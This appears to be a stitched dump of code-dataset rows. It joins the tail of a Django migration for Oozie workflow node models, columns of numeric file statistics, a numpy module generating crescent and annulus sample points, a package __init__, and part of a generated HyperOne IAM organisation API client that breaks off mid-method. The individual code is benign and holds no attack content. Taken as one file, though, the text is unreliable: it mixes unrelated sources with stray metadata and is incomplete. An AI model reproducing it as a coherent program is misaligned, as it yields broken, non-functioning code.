('job_xml', models.CharField(blank=True, default=b'', help_text='Refer to a Hadoop JobConf job.xml file bundled in the workflow deployment directory. Properties specified in the Job Properties element override properties specified in the files specified in the Job XML element.', max_length=512, verbose_name='Job XML')),
],
options={
'abstract': False,
},
bases=('oozie.node',),
),
migrations.CreateModel(
name='Ssh',
fields=[
('node_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='oozie.Node')),
('user', models.CharField(help_text='User executing the shell command.', max_length=64, verbose_name='User')),
('host', models.CharField(help_text='Where the shell will be executed.', max_length=256, verbose_name='Host')),
('command', models.CharField(help_text='The command that will be executed.', max_length=256, verbose_name='Ssh command')),
('params', models.TextField(default=b'[]', help_text='The arguments of the Ssh command.', verbose_name='Arguments')),
('capture_output', models.BooleanField(default=False, help_text='Capture output of the stdout of the Ssh command execution. The Ssh command output must be in Java properties file format and it must not exceed 2KB. From within the workflow definition, the output of an Ssh action node is accessible via the String action:output(String node, String key) function', verbose_name='Capture output')),
],
options={
'abstract': False,
},
bases=('oozie.node',),
),
migrations.CreateModel(
name='Start',
fields=[
('node_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='oozie.Node')),
],
options={
'abstract': False,
},
bases=('oozie.node',),
),
migrations.CreateModel(
name='Streaming',
fields=[
('node_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='oozie.Node')),
('files', models.TextField(default=b'[]', help_text='List of names or paths of files to be added to the distributed cache and the task running directory.', verbose_name='Files')),
('archives', models.TextField(default=b'[]', help_text='List of names or paths of the archives to be added to the distributed cache.', verbose_name='Archives')),
('job_properties', models.TextField(default=b'[]', help_text='For the job configuration (e.g. mapred.job.queue.name=production)', verbose_name='Hadoop job properties')),
('mapper', models.CharField(help_text='The executable/script to be used as mapper.', max_length=512, verbose_name='Mapper')),
('reducer', models.CharField(help_text='The executable/script to be used as reducer.', max_length=512, verbose_name='Reducer')),
],
options={
'abstract': False,
},
bases=('oozie.node',),
),
migrations.CreateModel(
name='SubWorkflow',
fields=[
('node_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='oozie.Node')),
('propagate_configuration', models.BooleanField(default=True, help_text='If the workflow job configuration should be propagated to the child workflow.', verbose_name='Propagate configuration')),
('job_properties', models.TextField(default=b'[]', help_text='Can be used to specify the job properties that are required to run the child workflow job.', verbose_name='Hadoop job properties')),
],
options={
'abstract': False,
},
bases=('oozie.node',),
),
migrations.CreateModel(
name='Workflow',
fields=[
('job_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='oozie.Job')),
('is_single', models.BooleanField(default=False)),
('job_xml', models.CharField(blank=True, default=b'', help_text='Refer to a Hadoop JobConf job.xml file bundled in the workflow deployment directory. Properties specified in the Job Properties element override properties specified in the files specified in the Job XML element.', max_length=512, verbose_name='Job XML')),
('job_properties', models.TextField(default=b'[]', help_text='Job configuration properties used by all the actions of the workflow (e.g. mapred.job.queue.name=production)', verbose_name='Hadoop job properties')),
('managed', models.BooleanField(default=True)),
('end', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='end_workflow', to='oozie.End')),
('start', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='start_workflow', to='oozie.Start')),
],
bases=('oozie.job',),
),
]
| 213.727494
| 24,420
| 0.67026
| 12,833
| 87,842
| 4.526689
| 0.087041
| 0.090616
| 0.013978
| 0.01625
| 0.900363
| 0.890568
| 0.879775
| 0.876039
| 0.864265
| 0.854074
| 0
| 0.018812
| 0.124337
| 87,842
| 410
| 24,421
| 214.24878
| 0.736401
| 0.000751
| 0
| 0.641791
| 1
| 0.094527
| 0.562029
| 0.056464
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.002488
| 0.014925
| 0
| 0.024876
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
ce5d0d2cb8340241d5663a853cab84c4e71e1fdb
| 1,742
|
py
|
Python
|
stoclust/examples.py
|
samlikesphysics/stoclust
|
488623fe093ce9b79e5cd2561f0535acf95463b6
|
[
"MIT"
] | null | null | null |
stoclust/examples.py
|
samlikesphysics/stoclust
|
488623fe093ce9b79e5cd2561f0535acf95463b6
|
[
"MIT"
] | null | null | null |
stoclust/examples.py
|
samlikesphysics/stoclust
|
488623fe093ce9b79e5cd2561f0535acf95463b6
|
[
"MIT"
] | null | null | null |
"""
stoclust.ensemble
Contains functions for generating example data.
Functions
---------
gen_moon(rad=1.0,occ=0.5,num_samples=100):
Generates random two-dimensional vectors,
arranged in a crescent moon shape.
gen_disk(rad1=1.0,rad2=2.0,num_samples=100):
Generates random two-dimensional vectors,
arranged in an annulus.
"""
import numpy as _np
def gen_moon(rad=1.0,occ=0.5,num_samples=100):
    """
    Generate random two-dimensional vectors arranged in a crescent moon shape.

    Points are drawn uniformly from a disk of radius ``rad`` centered at the
    origin and kept only if they fall outside an occluding disk of the same
    radius centered at ``(-occ, 0)`` (rejection sampling), leaving a crescent.

    Parameters
    ----------
    rad : float
        Radius of both the sampled disk and the occluding disk.
    occ : float
        Horizontal offset of the occluding disk; controls the degree of
        occultation. Must be nonzero.
    num_samples : int
        Number of points to generate.

    Returns
    -------
    numpy.ndarray
        Array of shape ``(num_samples, 2)`` holding the accepted points.

    Raises
    ------
    ValueError
        If ``occ`` is 0: the occluding disk then covers every candidate
        point, the rejection test can never succeed, and sampling would
        loop forever.
    """
    if occ == 0:
        raise ValueError(
            "occ must be nonzero; with occ=0 the occluding circle covers "
            "the whole disk and no sample can ever be accepted."
        )
    samples = _np.zeros([num_samples, 2])
    sampled = 0
    while sampled < num_samples:
        # Uniform point in the disk: the sqrt corrects the radial density.
        r = _np.sqrt(_np.random.rand()) * rad
        theta = _np.random.rand() * 2 * _np.pi
        x = r * _np.cos(theta)
        y = r * _np.sin(theta)
        # Accept only points outside the occluding circle at (-occ, 0).
        if _np.sqrt((x + occ) ** 2 + y ** 2) > rad:
            samples[sampled, 0] = x
            samples[sampled, 1] = y
            sampled += 1
    return samples
def gen_disk(rad1=1.0,rad2=2.0,num_samples=100):
    """
    Generate random two-dimensional vectors arranged in an annulus.

    Candidate points are drawn uniformly from a disk of radius ``rad2``
    and kept only when they fall outside the inner circle of radius
    ``rad1`` (rejection sampling), producing a ring between the two radii.

    Parameters
    ----------
    rad1 : float
        Inner radius subtracted from the middle of the disk.
    rad2 : float
        Outer radius of the sampled disk.
    num_samples : int
        Number of points to generate.

    Returns
    -------
    numpy.ndarray
        Array of shape ``(num_samples, 2)`` holding the accepted points.
    """
    samples = _np.zeros([num_samples, 2])
    count = 0
    while count < num_samples:
        # Uniform draw over the outer disk; the sqrt corrects the
        # radial density so the area is covered evenly.
        radius = _np.sqrt(_np.random.rand()) * rad2
        angle = _np.random.rand() * 2 * _np.pi
        if radius > rad1:
            # Keep the point: it lies in the annulus rad1 < r < rad2.
            samples[count, 0] = radius * _np.cos(angle)
            samples[count, 1] = radius * _np.sin(angle)
            count += 1
    return samples
| 29.525424
| 117
| 0.629162
| 261
| 1,742
| 4.091954
| 0.279693
| 0.074906
| 0.048689
| 0.082397
| 0.756554
| 0.756554
| 0.756554
| 0.756554
| 0.756554
| 0.689139
| 0
| 0.038551
| 0.255454
| 1,742
| 58
| 118
| 30.034483
| 0.784888
| 0.448909
| 0
| 0.740741
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.074074
| false
| 0
| 0.037037
| 0
| 0.185185
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ce8ece8db0ea2f14d6bba312b20db3cbd442dbeb
| 112
|
py
|
Python
|
colosseum/mdps/taxi/__init__.py
|
MichelangeloConserva/Colosseum
|
b0711fd9ce75520deb74cda75c148984a8e4152f
|
[
"MIT"
] | null | null | null |
colosseum/mdps/taxi/__init__.py
|
MichelangeloConserva/Colosseum
|
b0711fd9ce75520deb74cda75c148984a8e4152f
|
[
"MIT"
] | null | null | null |
colosseum/mdps/taxi/__init__.py
|
MichelangeloConserva/Colosseum
|
b0711fd9ce75520deb74cda75c148984a8e4152f
|
[
"MIT"
] | null | null | null |
from colosseum.mdps.taxi.continuous import TaxiContinuous
from colosseum.mdps.taxi.episodic import TaxiEpisodic
| 37.333333
| 57
| 0.875
| 14
| 112
| 7
| 0.642857
| 0.265306
| 0.346939
| 0.428571
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.071429
| 112
| 2
| 58
| 56
| 0.942308
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
0c83b18428768dbc68cbe5c4c52d97022a467d5a
| 151,640
|
py
|
Python
|
h1/api/iam_organisation_api.py
|
hyperonecom/h1-client-python
|
4ce355852ba3120ec1b8f509ab5894a5c08da730
|
[
"MIT"
] | null | null | null |
h1/api/iam_organisation_api.py
|
hyperonecom/h1-client-python
|
4ce355852ba3120ec1b8f509ab5894a5c08da730
|
[
"MIT"
] | null | null | null |
h1/api/iam_organisation_api.py
|
hyperonecom/h1-client-python
|
4ce355852ba3120ec1b8f509ab5894a5c08da730
|
[
"MIT"
] | null | null | null |
"""
HyperOne
HyperOne API # noqa: E501
The version of the OpenAPI document: 0.1.0
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from h1.api_client import ApiClient, Endpoint as _Endpoint
from h1.model_utils import ( # noqa: F401
check_allowed_values,
check_validations,
date,
datetime,
file_type,
none_type,
validate_and_convert_types
)
from h1.model.billing import Billing
from h1.model.event import Event
from h1.model.iam_organisation_create import IamOrganisationCreate
from h1.model.iam_organisation_invitation_accept import IamOrganisationInvitationAccept
from h1.model.iam_organisation_ownership_create import IamOrganisationOwnershipCreate
from h1.model.iam_organisation_payment_allocate import IamOrganisationPaymentAllocate
from h1.model.iam_organisation_proforma_create import IamOrganisationProformaCreate
from h1.model.iam_organisation_transfer_accept import IamOrganisationTransferAccept
from h1.model.iam_organisation_update import IamOrganisationUpdate
from h1.model.inline_response400 import InlineResponse400
from h1.model.invitation import Invitation
from h1.model.invoice import Invoice
from h1.model.organisation import Organisation
from h1.model.ownership import Ownership
from h1.model.payment import Payment
from h1.model.proforma import Proforma
from h1.model.resource_service import ResourceService
from h1.model.transfer import Transfer
class IamOrganisationApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def __iam_organisation_billing_list(
self,
organisation_id,
**kwargs
):
"""List iam/organisation.billing # noqa: E501
List iam/organisation.billing # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.iam_organisation_billing_list(organisation_id, async_req=True)
>>> result = thread.get()
Args:
organisation_id (str): Organisation Id
Keyword Args:
start (datetime): start. [optional]
end (datetime): end. [optional]
resource_type (str): resource.type. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
[Billing]
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['organisation_id'] = \
organisation_id
return self.call_with_http_info(**kwargs)
self.iam_organisation_billing_list = _Endpoint(
settings={
'response_type': ([Billing],),
'auth': [
'BearerAuth'
],
'endpoint_path': '/iam/organisation/{organisationId}/billing',
'operation_id': 'iam_organisation_billing_list',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'organisation_id',
'start',
'end',
'resource_type',
],
'required': [
'organisation_id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'organisation_id':
(str,),
'start':
(datetime,),
'end':
(datetime,),
'resource_type':
(str,),
},
'attribute_map': {
'organisation_id': 'organisationId',
'start': 'start',
'end': 'end',
'resource_type': 'resource.type',
},
'location_map': {
'organisation_id': 'path',
'start': 'query',
'end': 'query',
'resource_type': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__iam_organisation_billing_list
)
def __iam_organisation_create(
self,
iam_organisation_create,
**kwargs
):
"""Create iam/organisation # noqa: E501
Create organisation # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.iam_organisation_create(iam_organisation_create, async_req=True)
>>> result = thread.get()
Args:
iam_organisation_create (IamOrganisationCreate):
Keyword Args:
x_idempotency_key (str): Idempotency key. [optional]
x_dry_run (str): Dry run. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
Organisation
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['iam_organisation_create'] = \
iam_organisation_create
return self.call_with_http_info(**kwargs)
self.iam_organisation_create = _Endpoint(
settings={
'response_type': (Organisation,),
'auth': [
'BearerAuth'
],
'endpoint_path': '/iam/organisation',
'operation_id': 'iam_organisation_create',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'iam_organisation_create',
'x_idempotency_key',
'x_dry_run',
],
'required': [
'iam_organisation_create',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'iam_organisation_create':
(IamOrganisationCreate,),
'x_idempotency_key':
(str,),
'x_dry_run':
(str,),
},
'attribute_map': {
'x_idempotency_key': 'x-idempotency-key',
'x_dry_run': 'x-dry-run',
},
'location_map': {
'iam_organisation_create': 'body',
'x_idempotency_key': 'header',
'x_dry_run': 'header',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client,
callable=__iam_organisation_create
)
def __iam_organisation_delete(
self,
organisation_id,
**kwargs
):
"""Delete iam/organisation # noqa: E501
Delete organisation # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.iam_organisation_delete(organisation_id, async_req=True)
>>> result = thread.get()
Args:
organisation_id (str): Organisation Id
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
None
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['organisation_id'] = \
organisation_id
return self.call_with_http_info(**kwargs)
self.iam_organisation_delete = _Endpoint(
settings={
'response_type': None,
'auth': [
'BearerAuth'
],
'endpoint_path': '/iam/organisation/{organisationId}',
'operation_id': 'iam_organisation_delete',
'http_method': 'DELETE',
'servers': None,
},
params_map={
'all': [
'organisation_id',
],
'required': [
'organisation_id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'organisation_id':
(str,),
},
'attribute_map': {
'organisation_id': 'organisationId',
},
'location_map': {
'organisation_id': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__iam_organisation_delete
)
def __iam_organisation_event_get(
self,
organisation_id,
event_id,
**kwargs
):
"""Get iam/organisation.event # noqa: E501
Get iam/organisation.event # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.iam_organisation_event_get(organisation_id, event_id, async_req=True)
>>> result = thread.get()
Args:
organisation_id (str): Organisation Id
event_id (str): eventId
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
Event
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['organisation_id'] = \
organisation_id
kwargs['event_id'] = \
event_id
return self.call_with_http_info(**kwargs)
self.iam_organisation_event_get = _Endpoint(
settings={
'response_type': (Event,),
'auth': [
'BearerAuth'
],
'endpoint_path': '/iam/organisation/{organisationId}/event/{eventId}',
'operation_id': 'iam_organisation_event_get',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'organisation_id',
'event_id',
],
'required': [
'organisation_id',
'event_id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'organisation_id':
(str,),
'event_id':
(str,),
},
'attribute_map': {
'organisation_id': 'organisationId',
'event_id': 'eventId',
},
'location_map': {
'organisation_id': 'path',
'event_id': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__iam_organisation_event_get
)
def __iam_organisation_event_list(
self,
organisation_id,
**kwargs
):
"""List iam/organisation.event # noqa: E501
List iam/organisation.event # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.iam_organisation_event_list(organisation_id, async_req=True)
>>> result = thread.get()
Args:
organisation_id (str): Organisation Id
Keyword Args:
limit (float): $limit. [optional] if omitted the server will use the default value of 100
skip (float): $skip. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
[Event]
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['organisation_id'] = \
organisation_id
return self.call_with_http_info(**kwargs)
self.iam_organisation_event_list = _Endpoint(
settings={
'response_type': ([Event],),
'auth': [
'BearerAuth'
],
'endpoint_path': '/iam/organisation/{organisationId}/event',
'operation_id': 'iam_organisation_event_list',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'organisation_id',
'limit',
'skip',
],
'required': [
'organisation_id',
],
'nullable': [
],
'enum': [
],
'validation': [
'limit',
]
},
root_map={
'validations': {
('limit',): {
'inclusive_maximum': 1000,
'inclusive_minimum': 1,
},
},
'allowed_values': {
},
'openapi_types': {
'organisation_id':
(str,),
'limit':
(float,),
'skip':
(float,),
},
'attribute_map': {
'organisation_id': 'organisationId',
'limit': '$limit',
'skip': '$skip',
},
'location_map': {
'organisation_id': 'path',
'limit': 'query',
'skip': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__iam_organisation_event_list
)
def __iam_organisation_get(
self,
organisation_id,
**kwargs
):
"""Get iam/organisation # noqa: E501
Returns a single organisation # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.iam_organisation_get(organisation_id, async_req=True)
>>> result = thread.get()
Args:
organisation_id (str): Organisation Id
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
Organisation
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['organisation_id'] = \
organisation_id
return self.call_with_http_info(**kwargs)
self.iam_organisation_get = _Endpoint(
settings={
'response_type': (Organisation,),
'auth': [
'BearerAuth'
],
'endpoint_path': '/iam/organisation/{organisationId}',
'operation_id': 'iam_organisation_get',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'organisation_id',
],
'required': [
'organisation_id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'organisation_id':
(str,),
},
'attribute_map': {
'organisation_id': 'organisationId',
},
'location_map': {
'organisation_id': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__iam_organisation_get
)
def __iam_organisation_invitation_accept(
self,
organisation_id,
invitation_id,
iam_organisation_invitation_accept,
**kwargs
):
"""Accept iam/organisation.invitation # noqa: E501
action accept # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.iam_organisation_invitation_accept(organisation_id, invitation_id, iam_organisation_invitation_accept, async_req=True)
>>> result = thread.get()
Args:
organisation_id (str): Organisation Id
invitation_id (str): invitationId
iam_organisation_invitation_accept (IamOrganisationInvitationAccept):
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
Invitation
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['organisation_id'] = \
organisation_id
kwargs['invitation_id'] = \
invitation_id
kwargs['iam_organisation_invitation_accept'] = \
iam_organisation_invitation_accept
return self.call_with_http_info(**kwargs)
self.iam_organisation_invitation_accept = _Endpoint(
settings={
'response_type': (Invitation,),
'auth': [
'BearerAuth'
],
'endpoint_path': '/iam/organisation/{organisationId}/invitation/{invitationId}/actions/accept',
'operation_id': 'iam_organisation_invitation_accept',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'organisation_id',
'invitation_id',
'iam_organisation_invitation_accept',
],
'required': [
'organisation_id',
'invitation_id',
'iam_organisation_invitation_accept',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'organisation_id':
(str,),
'invitation_id':
(str,),
'iam_organisation_invitation_accept':
(IamOrganisationInvitationAccept,),
},
'attribute_map': {
'organisation_id': 'organisationId',
'invitation_id': 'invitationId',
},
'location_map': {
'organisation_id': 'path',
'invitation_id': 'path',
'iam_organisation_invitation_accept': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client,
callable=__iam_organisation_invitation_accept
)
def __iam_organisation_invitation_delete(
self,
organisation_id,
invitation_id,
**kwargs
):
"""Delete iam/organisation.invitation # noqa: E501
Delete iam/organisation.invitation # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.iam_organisation_invitation_delete(organisation_id, invitation_id, async_req=True)
>>> result = thread.get()
Args:
organisation_id (str): Organisation Id
invitation_id (str): invitationId
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
None
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
